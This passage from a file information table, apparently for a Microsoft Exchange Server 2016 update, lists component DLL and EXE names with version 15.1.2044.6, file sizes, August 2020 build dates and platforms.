\nMicrosoft.exchange.antispamupdate.eventlog.dll| 15.1.2044.6| 15,752| 12-Aug-2020| 20:15| x64 \nMicrosoft.exchange.antispamupdatesvc.exe| 15.1.2044.6| 27,016| 12-Aug-2020| 20:15| x86 \nMicrosoft.exchange.approval.applications.dll| 15.1.2044.6| 53,632| 12-Aug-2020| 20:12| x86 \nMicrosoft.exchange.assistants.dll| 15.1.2044.6| 924,040| 12-Aug-2020| 20:15| x86 \nMicrosoft.exchange.assistants.eventlog.dll| 15.1.2044.6| 25,984| 12-Aug-2020| 20:14| x64 \nMicrosoft.exchange.assistants.interfaces.dll| 15.1.2044.6| 42,368| 12-Aug-2020| 20:15| x86 \nMicrosoft.exchange.audit.azureclient.dll| 15.1.2044.6| 15,240| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.auditlogsearch.eventlog.dll| 15.1.2044.6| 14,720| 12-Aug-2020| 20:13| x64 \nMicrosoft.exchange.auditlogsearchservicelet.dll| 15.1.2044.6| 70,536| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.auditstoragemonitorservicelet.dll| 15.1.2044.6| 94,600| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.auditstoragemonitorservicelet.eventlog.dll| 15.1.2044.6| 13,184| 12-Aug-2020| 20:14| x64 \nMicrosoft.exchange.authadmin.eventlog.dll| 15.1.2044.6| 15,744| 12-Aug-2020| 20:15| x64 \nMicrosoft.exchange.authadminservicelet.dll| 15.1.2044.6| 36,744| 12-Aug-2020| 20:15| x86 \nMicrosoft.exchange.authservicehostservicelet.dll| 15.1.2044.6| 15,744| 12-Aug-2020| 20:15| x86 \nMicrosoft.exchange.autodiscover.configuration.dll| 15.1.2044.6| 79,752| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.autodiscover.dll| 15.1.2044.6| 396,168| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.autodiscover.eventlogs.dll| 15.1.2044.6| 21,384| 12-Aug-2020| 20:12| x64 \nMicrosoft.exchange.autodiscoverv2.dll| 15.1.2044.6| 57,216| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.bandwidthmonitorservicelet.dll| 15.1.2044.6| 14,728| 12-Aug-2020| 20:15| x86 \nMicrosoft.exchange.batchservice.dll| 15.1.2044.6| 35,712| 12-Aug-2020| 20:13| x86 \nMicrosoft.exchange.cabutility.dll| 15.1.2044.6| 276,360| 12-Aug-2020| 20:15| x64 \nMicrosoft.exchange.certificatedeployment.eventlog.dll| 15.1.2044.6| 16,256| 12-Aug-2020| 20:13| x64 \nMicrosoft.exchange.certificatedeploymentservicelet.dll| 15.1.2044.6| 25,992| 12-Aug-2020| 20:15| x86 \nMicrosoft.exchange.certificatenotification.eventlog.dll| 15.1.2044.6| 13,704| 12-Aug-2020| 20:12| x64 \nMicrosoft.exchange.certificatenotificationservicelet.dll| 15.1.2044.6| 23,432| 12-Aug-2020| 20:15| x86 \nMicrosoft.exchange.clients.common.dll| 15.1.2044.6| 377,216| 12-Aug-2020| 20:15| x86 \nMicrosoft.exchange.clients.eventlogs.dll| 15.1.2044.6| 83,848| 12-Aug-2020| 20:16| x64 \nMicrosoft.exchange.clients.owa.dll| 15.1.2044.6| 2,970,496| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.clients.owa2.server.dll| 15.1.2044.6| 5,028,736| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.clients.owa2.servervariantconfiguration.dll| 15.1.2044.6| 894,856| 12-Aug-2020| 20:10| x86 \nMicrosoft.exchange.clients.security.dll| 15.1.2044.6| 413,576| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.clients.strings.dll| 15.1.2044.6| 924,544| 12-Aug-2020| 20:12| x86 \nMicrosoft.exchange.cluster.bandwidthmonitor.dll| 15.1.2044.6| 31,616| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.cluster.common.dll| 15.1.2044.6| 52,096| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.cluster.common.extensions.dll| 15.1.2044.6| 21,888| 12-Aug-2020| 20:15| x86 \nMicrosoft.exchange.cluster.diskmonitor.dll| 15.1.2044.6| 33,664| 12-Aug-2020| 20:15| x86 \nMicrosoft.exchange.cluster.replay.dll| 15.1.2044.6| 3,478,400| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.cluster.replicaseeder.dll| 15.1.2044.6| 108,416| 12-Aug-2020| 20:15| x64 \nMicrosoft.exchange.cluster.replicavsswriter.dll| 15.1.2044.6| 288,648| 12-Aug-2020| 20:15| x64 \nMicrosoft.exchange.cluster.shared.dll| 15.1.2044.6| 621,960| 12-Aug-2020| 20:15| x86 \nMicrosoft.exchange.common.agentconfig.transport.dll| 15.1.2044.6| 86,400| 12-Aug-2020| 20:10| x86 \nMicrosoft.exchange.common.componentconfig.transport.dll| 15.1.2044.6| 1,828,736| 12-Aug-2020| 20:12| x86 \nMicrosoft.exchange.common.directory.adagentservicevariantconfig.dll| 15.1.2044.6| 31,616| 12-Aug-2020| 20:10| x86 \nMicrosoft.exchange.common.directory.directoryvariantconfig.dll| 15.1.2044.6| 465,792| 12-Aug-2020| 20:10| x86 \nMicrosoft.exchange.common.directory.domtvariantconfig.dll| 15.1.2044.6| 25,480| 12-Aug-2020| 20:11| x86 \nMicrosoft.exchange.common.directory.ismemberofresolverconfig.dll| 15.1.2044.6| 38,272| 12-Aug-2020| 20:12| x86 \nMicrosoft.exchange.common.directory.tenantrelocationvariantconfig.dll| 15.1.2044.6| 102,784| 12-Aug-2020| 20:11| x86 \nMicrosoft.exchange.common.directory.topologyservicevariantconfig.dll| 15.1.2044.6| 48,512| 12-Aug-2020| 20:12| x86 \nMicrosoft.exchange.common.diskmanagement.dll| 15.1.2044.6| 67,456| 12-Aug-2020| 20:13| x86 \nMicrosoft.exchange.common.dll| 15.1.2044.6| 172,928| 12-Aug-2020| 20:10| x86 \nMicrosoft.exchange.common.encryption.variantconfig.dll| 15.1.2044.6| 113,536| 12-Aug-2020| 20:10| x86 \nMicrosoft.exchange.common.il.dll| 15.1.2044.6| 13,696| 12-Aug-2020| 20:10| x86 \nMicrosoft.exchange.common.inference.dll| 15.1.2044.6| 130,432| 12-Aug-2020| 20:10| x86 \nMicrosoft.exchange.common.optics.dll| 15.1.2044.6| 63,872| 12-Aug-2020| 20:15| x86 \nMicrosoft.exchange.common.processmanagermsg.dll| 15.1.2044.6| 19,840| 12-Aug-2020| 20:15| x64 \nMicrosoft.exchange.common.protocols.popimap.dll| 15.1.2044.6| 15,240| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.common.search.dll| 15.1.2044.6| 107,912| 12-Aug-2020| 20:15| x86 \nMicrosoft.exchange.common.search.eventlog.dll| 15.1.2044.6| 17,792| 12-Aug-2020| 20:12| x64 \nMicrosoft.exchange.common.smtp.dll| 15.1.2044.6| 51,584| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.common.suiteservices.suiteservicesvariantconfig.dll| 15.1.2044.6| 36,728| 12-Aug-2020| 20:10| x86 \nMicrosoft.exchange.common.transport.azure.dll| 15.1.2044.6| 27,528| 12-Aug-2020| 20:15| x86 \nMicrosoft.exchange.common.transport.monitoringconfig.dll| 15.1.2044.6| 1,042,312| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.commonmsg.dll| 15.1.2044.6| 29,056| 12-Aug-2020| 20:15| x64 \nMicrosoft.exchange.compliance.auditlogpumper.messages.dll| 15.1.2044.6| 13,192| 12-Aug-2020| 20:14| x64 \nMicrosoft.exchange.compliance.auditservice.core.dll| 15.1.2044.6| 181,128| 12-Aug-2020| 20:15| x86 \nMicrosoft.exchange.compliance.auditservice.messages.dll| 15.1.2044.6| 30,080| 12-Aug-2020| 20:15| x64 \nMicrosoft.exchange.compliance.common.dll| 15.1.2044.6| 22,408| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.compliance.crimsonevents.dll| 15.1.2044.6| 85,888| 12-Aug-2020| 20:14| x64 \nMicrosoft.exchange.compliance.dll| 15.1.2044.6| 41,352| 12-Aug-2020| 20:10| x86 \nMicrosoft.exchange.compliance.recordreview.dll| 15.1.2044.6| 37,256| 12-Aug-2020| 20:15| x86 \nMicrosoft.exchange.compliance.supervision.dll| 15.1.2044.6| 50,560| 12-Aug-2020| 20:15| x86 \nMicrosoft.exchange.compliance.taskcreator.dll| 15.1.2044.6| 33,144| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.compliance.taskdistributioncommon.dll| 15.1.2044.6| 1,100,168| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.compliance.taskdistributionfabric.dll| 15.1.2044.6| 206,720| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.compliance.taskplugins.dll| 15.1.2044.6| 210,816| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.compression.dll| 15.1.2044.6| 17,288| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.configuration.certificateauth.dll| 15.1.2044.6| 37,760| 12-Aug-2020| 20:15| x86 \nMicrosoft.exchange.configuration.certificateauth.eventlog.dll| 15.1.2044.6| 14,208| 12-Aug-2020| 20:13| x64 \nMicrosoft.exchange.configuration.core.dll| 15.1.2044.6| 145,792| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.configuration.core.eventlog.dll| 15.1.2044.6| 14,216| 12-Aug-2020| 20:13| x64 \nMicrosoft.exchange.configuration.delegatedauth.dll| 15.1.2044.6| 53,120| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.configuration.delegatedauth.eventlog.dll| 15.1.2044.6| 15,752| 12-Aug-2020| 20:15| x64 \nMicrosoft.exchange.configuration.diagnosticsmodules.dll| 15.1.2044.6| 23,432| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.configuration.diagnosticsmodules.eventlog.dll| 15.1.2044.6| 13,192| 12-Aug-2020| 20:13| x64 \nMicrosoft.exchange.configuration.failfast.dll| 15.1.2044.6| 54,664| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.configuration.failfast.eventlog.dll| 15.1.2044.6| 13,696| 12-Aug-2020| 20:13| x64 \nMicrosoft.exchange.configuration.objectmodel.dll| 15.1.2044.6| 1,844,608| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.configuration.objectmodel.eventlog.dll| 15.1.2044.6| 30,080| 12-Aug-2020| 20:12| x64 \nMicrosoft.exchange.configuration.redirectionmodule.dll| 15.1.2044.6| 68,488| 12-Aug-2020| 20:15| x86 \nMicrosoft.exchange.configuration.redirectionmodule.eventlog.dll| 15.1.2044.6| 15,232| 12-Aug-2020| 20:13| x64 \nMicrosoft.exchange.configuration.remotepowershellbackendcmdletproxymodule.dll| 15.1.2044.6| 21,376| 12-Aug-2020| 20:15| x86 \nMicrosoft.exchange.configuration.remotepowershellbackendcmdletproxymodule.eventlog.dll| 15.1.2044.6| 13,192| 12-Aug-2020| 20:13| x64 \nMicrosoft.exchange.connectiondatacollector.dll| 15.1.2044.6| 25,984| 12-Aug-2020| 20:15| x86 \nMicrosoft.exchange.connections.common.dll| 15.1.2044.6| 169,864| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.connections.eas.dll| 15.1.2044.6| 330,112| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.connections.imap.dll| 15.1.2044.6| 173,952| 12-Aug-2020| 20:15| x86 \nMicrosoft.exchange.connections.pop.dll| 15.1.2044.6| 71,048| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.contentfilter.wrapper.exe| 15.1.2044.6| 203,648| 12-Aug-2020| 20:14| x64 \nMicrosoft.exchange.context.client.dll| 15.1.2044.6| 27,000| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.context.configuration.dll| 15.1.2044.6| 51,584| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.context.core.dll| 15.1.2044.6| 51,080| 12-Aug-2020| 20:15| x86 \nMicrosoft.exchange.context.datamodel.dll| 15.1.2044.6| 46,976| 12-Aug-2020| 20:15| x86 \nMicrosoft.exchange.core.strings.dll| 15.1.2044.6| 1,092,488| 12-Aug-2020| 20:10| x86 \nMicrosoft.exchange.core.timezone.dll| 15.1.2044.6| 57,216| 12-Aug-2020| 20:12| x86 \nMicrosoft.exchange.data.applicationlogic.deep.dll| 15.1.2044.6| 326,528| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.data.applicationlogic.dll| 15.1.2044.6| 3,352,960| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.data.applicationlogic.eventlog.dll| 15.1.2044.6| 35,720| 12-Aug-2020| 20:12| x64 \nMicrosoft.exchange.data.applicationlogic.monitoring.ifx.dll| 15.1.2044.6| 17,792| 12-Aug-2020| 20:15| x86 \nMicrosoft.exchange.data.connectors.dll| 15.1.2044.6| 165,240| 12-Aug-2020| 20:10| x86 \nMicrosoft.exchange.data.consumermailboxprovisioning.dll| 15.1.2044.6| 619,392| 12-Aug-2020| 20:10| x86 \nMicrosoft.exchange.data.directory.dll| 15.1.2044.6| 7,781,256| 12-Aug-2020| 20:11| x86 \nMicrosoft.exchange.data.directory.eventlog.dll| 15.1.2044.6| 80,264| 12-Aug-2020| 20:12| x64 \nMicrosoft.exchange.data.dll| 15.1.2044.6| 1,785,736| 12-Aug-2020| 20:10| x86 \nMicrosoft.exchange.data.groupmailboxaccesslayer.dll| 15.1.2044.6| 1,626,504| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.data.ha.dll| 15.1.2044.6| 362,368| 12-Aug-2020| 20:13| x86 \nMicrosoft.exchange.data.imageanalysis.dll| 15.1.2044.6| 105,856| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.data.mailboxfeatures.dll| 15.1.2044.6| 15,752| 12-Aug-2020| 20:15| x86 \nMicrosoft.exchange.data.mailboxloadbalance.dll| 15.1.2044.6| 224,640| 12-Aug-2020| 20:15| x86 \nMicrosoft.exchange.data.mapi.dll| 15.1.2044.6| 186,752| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.data.metering.contracts.dll| 15.1.2044.6| 39,816| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.data.metering.dll| 15.1.2044.6| 119,168| 12-Aug-2020| 20:13| x86 \nMicrosoft.exchange.data.msosyncxsd.dll| 15.1.2044.6| 968,064| 12-Aug-2020| 20:10| x86 \nMicrosoft.exchange.data.notification.dll| 15.1.2044.6| 141,184| 12-Aug-2020| 20:12| x86 \nMicrosoft.exchange.data.personaldataplatform.dll| 15.1.2044.6| 769,416| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.data.providers.dll| 15.1.2044.6| 139,656| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.data.provisioning.dll| 15.1.2044.6| 56,704| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.data.rightsmanagement.dll| 15.1.2044.6| 453,000| 12-Aug-2020| 20:15| x86 \nMicrosoft.exchange.data.scheduledtimers.dll| 15.1.2044.6| 32,640| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.data.storage.clientstrings.dll| 15.1.2044.6| 256,384| 12-Aug-2020| 20:10| x86 \nMicrosoft.exchange.data.storage.dll| 15.1.2044.6| 11,640,192| 12-Aug-2020| 20:10| x86 \nMicrosoft.exchange.data.storage.eventlog.dll| 15.1.2044.6| 37,760| 12-Aug-2020| 20:13| x64 \nMicrosoft.exchange.data.storageconfigurationresources.dll| 15.1.2044.6| 655,744| 12-Aug-2020| 20:12| x86 \nMicrosoft.exchange.data.storeobjects.dll| 15.1.2044.6| 174,472| 12-Aug-2020| 20:10| x86 \nMicrosoft.exchange.data.throttlingservice.client.dll| 15.1.2044.6| 36,224| 12-Aug-2020| 20:15| x86 \nMicrosoft.exchange.data.throttlingservice.client.eventlog.dll| 15.1.2044.6| 14,208| 12-Aug-2020| 20:12| x64 \nMicrosoft.exchange.data.throttlingservice.eventlog.dll| 15.1.2044.6| 14,208| 12-Aug-2020| 20:12| x64 \nMicrosoft.exchange.datacenter.management.activemonitoring.recoveryservice.eventlog.dll| 15.1.2044.6| 14,712| 12-Aug-2020| 20:13| x64 \nMicrosoft.exchange.datacenterstrings.dll| 15.1.2044.6| 72,576| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.delivery.eventlog.dll| 15.1.2044.6| 13,184| 12-Aug-2020| 20:12| x64 \nMicrosoft.exchange.diagnostics.certificatelogger.dll| 15.1.2044.6| 22,920| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.diagnostics.dll| 15.1.2044.6| 2,210,176| 12-Aug-2020| 20:10| x86 \nMicrosoft.exchange.diagnostics.dll.deploy| 15.1.2044.6| 2,210,176| 12-Aug-2020| 20:10| Not applicable \nMicrosoft.exchange.diagnostics.performancelogger.dll| 15.1.2044.6| 23,936| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.diagnostics.service.common.dll| 15.1.2044.6| 546,696| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.diagnostics.service.eventlog.dll| 15.1.2044.6| 215,424| 12-Aug-2020| 20:15| x64 \nMicrosoft.exchange.diagnostics.service.exchangejobs.dll| 15.1.2044.6| 193,408| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.diagnostics.service.exe| 15.1.2044.6| 146,312| 12-Aug-2020| 20:15| x86 \nMicrosoft.exchange.diagnostics.service.fuseboxperfcounters.dll| 15.1.2044.6| 27,520| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.diagnosticsaggregation.eventlog.dll| 15.1.2044.6| 13,696| 12-Aug-2020| 20:14| x64 \nMicrosoft.exchange.diagnosticsaggregationservicelet.dll| 15.1.2044.6| 49,544| 12-Aug-2020| 20:15| x86 \nMicrosoft.exchange.directory.topologyservice.eventlog.dll| 15.1.2044.6| 28,032| 12-Aug-2020| 20:13| x64 \nMicrosoft.exchange.directory.topologyservice.exe| 15.1.2044.6| 208,768| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.disklocker.events.dll| 15.1.2044.6| 88,960| 12-Aug-2020| 20:15| x64 \nMicrosoft.exchange.disklocker.interop.dll| 15.1.2044.6| 32,632| 12-Aug-2020| 20:11| x86 \nMicrosoft.exchange.drumtesting.calendarmigration.dll| 15.1.2044.6| 45,960| 12-Aug-2020| 20:15| x86 \nMicrosoft.exchange.drumtesting.common.dll| 15.1.2044.6| 18,816| 12-Aug-2020| 20:15| x86 \nMicrosoft.exchange.dxstore.dll| 15.1.2044.6| 473,472| 12-Aug-2020| 20:13| x86 \nMicrosoft.exchange.dxstore.ha.events.dll| 15.1.2044.6| 206,208| 12-Aug-2020| 20:14| x64 \nMicrosoft.exchange.dxstore.ha.instance.exe| 15.1.2044.6| 36,736| 12-Aug-2020| 20:15| x86 \nMicrosoft.exchange.eac.flighting.dll| 15.1.2044.6| 131,456| 12-Aug-2020| 20:10| x86 \nMicrosoft.exchange.edgecredentialsvc.exe| 15.1.2044.6| 21,888| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.edgesync.common.dll| 15.1.2044.6| 148,352| 12-Aug-2020| 20:15| x86 \nMicrosoft.exchange.edgesync.datacenterproviders.dll| 15.1.2044.6| 220,032| 12-Aug-2020| 20:15| x86 \nMicrosoft.exchange.edgesync.eventlog.dll| 15.1.2044.6| 23,936| 12-Aug-2020| 20:13| x64 \nMicrosoft.exchange.edgesyncsvc.exe| 15.1.2044.6| 97,664| 12-Aug-2020| 20:15| x86 \nMicrosoft.exchange.ediscovery.export.dll| 15.1.2044.6| 1,266,056| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.ediscovery.export.dll.deploy| 15.1.2044.6| 1,266,056| 12-Aug-2020| 20:14| Not applicable \nMicrosoft.exchange.ediscovery.exporttool.application| Not applicable| 15,871| 12-Aug-2020| 20:14| Not applicable \nMicrosoft.exchange.ediscovery.exporttool.exe.deploy| 15.1.2044.6| 87,424| 12-Aug-2020| 20:14| Not applicable \nMicrosoft.exchange.ediscovery.exporttool.manifest| Not applicable| 66,829| 12-Aug-2020| 20:14| Not applicable \nMicrosoft.exchange.ediscovery.exporttool.strings.dll.deploy| 15.1.2044.6| 52,096| 12-Aug-2020| 20:13| Not applicable \nMicrosoft.exchange.ediscovery.mailboxsearch.dll| 15.1.2044.6| 294,280| 12-Aug-2020| 20:15| x86 \nMicrosoft.exchange.entities.birthdaycalendar.dll| 15.1.2044.6| 73,096| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.entities.booking.defaultservicesettings.dll| 15.1.2044.6| 45,960| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.entities.booking.dll| 15.1.2044.6| 218,504| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.entities.booking.management.dll| 15.1.2044.6| 78,208| 12-Aug-2020| 20:15| x86 \nMicrosoft.exchange.entities.bookings.dll| 15.1.2044.6| 35,712| 12-Aug-2020| 20:15| x86 \nMicrosoft.exchange.entities.calendaring.dll| 15.1.2044.6| 934,272| 12-Aug-2020| 20:15| x86 \nMicrosoft.exchange.entities.common.dll| 15.1.2044.6| 336,256| 12-Aug-2020| 20:12| x86 \nMicrosoft.exchange.entities.connectors.dll| 15.1.2044.6| 52,608| 12-Aug-2020| 20:15| x86 \nMicrosoft.exchange.entities.contentsubmissions.dll| 15.1.2044.6| 32,136| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.entities.context.dll| 15.1.2044.6| 60,800| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.entities.datamodel.dll| 15.1.2044.6| 854,400| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.entities.fileproviders.dll| 15.1.2044.6| 291,712| 12-Aug-2020| 20:15| x86 \nMicrosoft.exchange.entities.foldersharing.dll| 15.1.2044.6| 39,296| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.entities.holidaycalendars.dll| 15.1.2044.6| 76,168| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.entities.insights.dll| 15.1.2044.6| 166,784| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.entities.meetinglocation.dll| 15.1.2044.6| 1,486,728| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.entities.meetingparticipants.dll| 15.1.2044.6| 122,248| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.entities.meetingtimecandidates.dll| 15.1.2044.6| 12,327,296| 12-Aug-2020| 20:15| x86 \nMicrosoft.exchange.entities.onlinemeetings.dll| 15.1.2044.6| 264,064| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.entities.people.dll| 15.1.2044.6| 37,760| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.entities.peopleinsights.dll| 15.1.2044.6| 186,760| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.entities.reminders.dll| 15.1.2044.6| 64,392| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.entities.schedules.dll| 15.1.2044.6| 83,848| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.entities.shellservice.dll| 15.1.2044.6| 63,880| 12-Aug-2020| 20:15| x86 \nMicrosoft.exchange.entities.tasks.dll| 15.1.2044.6| 100,224| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.entities.xrm.dll| 15.1.2044.6| 144,768| 12-Aug-2020| 20:13| x86 \nMicrosoft.exchange.entityextraction.calendar.dll| 15.1.2044.6| 270,216| 12-Aug-2020| 20:15| x86 \nMicrosoft.exchange.eserepl.common.dll| 15.1.2044.6| 15,224| 12-Aug-2020| 20:15| x86 \nMicrosoft.exchange.eserepl.configuration.dll| 15.1.2044.6| 15,744| 12-Aug-2020| 20:15| x86 \nMicrosoft.exchange.eserepl.dll| 15.1.2044.6| 130,432| 12-Aug-2020| 20:15| x86 \nMicrosoft.exchange.ews.configuration.dll| 15.1.2044.6| 254,344| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.exchangecertificate.eventlog.dll| 15.1.2044.6| 13,184| 12-Aug-2020| 20:13| x64 \nMicrosoft.exchange.exchangecertificateservicelet.dll| 15.1.2044.6| 37,256| 12-Aug-2020| 20:15| x86 \nMicrosoft.exchange.extensibility.internal.dll| 15.1.2044.6| 640,888| 12-Aug-2020| 20:10| x86 \nMicrosoft.exchange.extensibility.partner.dll| 15.1.2044.6| 37,248| 12-Aug-2020| 20:10| x86 \nMicrosoft.exchange.federateddirectory.dll| 15.1.2044.6| 146,312| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.ffosynclogmsg.dll| 15.1.2044.6| 13,184| 12-Aug-2020| 20:14| x64 \nMicrosoft.exchange.frontendhttpproxy.dll| 15.1.2044.6| 592,256| 12-Aug-2020| 20:15| x86 \nMicrosoft.exchange.frontendhttpproxy.eventlogs.dll| 15.1.2044.6| 14,720| 12-Aug-2020| 20:13| x64 \nMicrosoft.exchange.frontendtransport.monitoring.dll| 15.1.2044.6| 30,088| 12-Aug-2020| 20:15| x86 \nMicrosoft.exchange.griffin.variantconfiguration.dll| 15.1.2044.6| 99,720| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.hathirdpartyreplication.dll| 15.1.2044.6| 42,368| 12-Aug-2020| 20:13| x86 \nMicrosoft.exchange.helpprovider.dll| 15.1.2044.6| 40,328| 12-Aug-2020| 20:12| x86 \nMicrosoft.exchange.httpproxy.addressfinder.dll| 15.1.2044.6| 54,136| 12-Aug-2020| 20:13| x86 \nMicrosoft.exchange.httpproxy.common.dll| 15.1.2044.6| 163,712| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.httpproxy.diagnostics.dll| 15.1.2044.6| 58,752| 12-Aug-2020| 20:12| x86 \nMicrosoft.exchange.httpproxy.flighting.dll| 15.1.2044.6| 204,160| 12-Aug-2020| 20:11| x86 \nMicrosoft.exchange.httpproxy.passivemonitor.dll| 15.1.2044.6| 17,792| 12-Aug-2020| 20:15| x86 \nMicrosoft.exchange.httpproxy.proxyassistant.dll| 15.1.2044.6| 30,592| 12-Aug-2020| 20:13| x86 \nMicrosoft.exchange.httpproxy.routerefresher.dll| 15.1.2044.6| 38,784| 12-Aug-2020| 20:15| x86 \nMicrosoft.exchange.httpproxy.routeselector.dll| 15.1.2044.6| 48,512| 12-Aug-2020| 20:12| x86 \nMicrosoft.exchange.httpproxy.routing.dll| 15.1.2044.6| 180,608| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.httpredirectmodules.dll| 15.1.2044.6| 36,736| 12-Aug-2020| 20:13| x86 \nMicrosoft.exchange.httputilities.dll| 15.1.2044.6| 25,984| 12-Aug-2020| 20:12| x86 \nMicrosoft.exchange.hygiene.data.dll| 15.1.2044.6| 1,868,160| 12-Aug-2020| 20:10| x86 \nMicrosoft.exchange.hygiene.diagnosisutil.dll| 15.1.2044.6| 54,656| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.hygiene.eopinstantprovisioning.dll| 15.1.2044.6| 35,712| 12-Aug-2020| 20:10| x86 \nMicrosoft.exchange.idserialization.dll| 15.1.2044.6| 35,720| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.imap4.eventlog.dll| 15.1.2044.6| 18,304| 12-Aug-2020| 20:13| x64 \nMicrosoft.exchange.imap4.eventlog.dll.fe| 15.1.2044.6| 18,304| 12-Aug-2020| 20:13| Not applicable \nMicrosoft.exchange.imap4.exe| 15.1.2044.6| 263,048| 12-Aug-2020| 20:10| x86 \nMicrosoft.exchange.imap4.exe.fe| 15.1.2044.6| 263,048| 12-Aug-2020| 20:10| Not applicable \nMicrosoft.exchange.imap4service.exe| 15.1.2044.6| 24,952| 12-Aug-2020| 20:10| x86 \nMicrosoft.exchange.imap4service.exe.fe| 15.1.2044.6| 24,952| 12-Aug-2020| 20:10| Not applicable \nMicrosoft.exchange.imapconfiguration.dl1| 15.1.2044.6| 53,120| 12-Aug-2020| 20:10| Not applicable \nMicrosoft.exchange.inference.common.dll| 15.1.2044.6| 216,968| 12-Aug-2020| 20:10| x86 \nMicrosoft.exchange.inference.hashtagsrelevance.dll| 15.1.2044.6| 32,136| 12-Aug-2020| 20:14| x64 \nMicrosoft.exchange.inference.peoplerelevance.dll| 15.1.2044.6| 281,984| 12-Aug-2020| 20:13| x86 \nMicrosoft.exchange.inference.ranking.dll| 15.1.2044.6| 18,824| 12-Aug-2020| 20:15| x86 \nMicrosoft.exchange.inference.safetylibrary.dll| 15.1.2044.6| 83,840| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.inference.service.eventlog.dll| 15.1.2044.6| 15,240| 12-Aug-2020| 20:13| x64 \nMicrosoft.exchange.infoworker.assistantsclientresources.dll| 15.1.2044.6| 94,088| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.infoworker.common.dll| 15.1.2044.6| 1,840,008| 12-Aug-2020| 20:15| x86 \nMicrosoft.exchange.infoworker.eventlog.dll| 15.1.2044.6| 71,552| 12-Aug-2020| 20:13| x64 \nMicrosoft.exchange.infoworker.meetingvalidator.dll| 15.1.2044.6| 175,488| 12-Aug-2020| 20:15| x86 \nMicrosoft.exchange.instantmessaging.dll| 15.1.2044.6| 45,952| 12-Aug-2020| 20:15| x86 \nMicrosoft.exchange.irm.formprotector.dll| 15.1.2044.6| 159,616| 12-Aug-2020| 20:15| x64 \nMicrosoft.exchange.irm.msoprotector.dll| 15.1.2044.6| 51,072| 12-Aug-2020| 20:15| x64 \nMicrosoft.exchange.irm.ofcprotector.dll| 15.1.2044.6| 45,960| 12-Aug-2020| 20:15| x64 \nMicrosoft.exchange.isam.databasemanager.dll| 15.1.2044.6| 30,592| 12-Aug-2020| 20:15| x86 \nMicrosoft.exchange.isam.esebcli.dll| 15.1.2044.6| 100,232| 12-Aug-2020| 20:14| x64 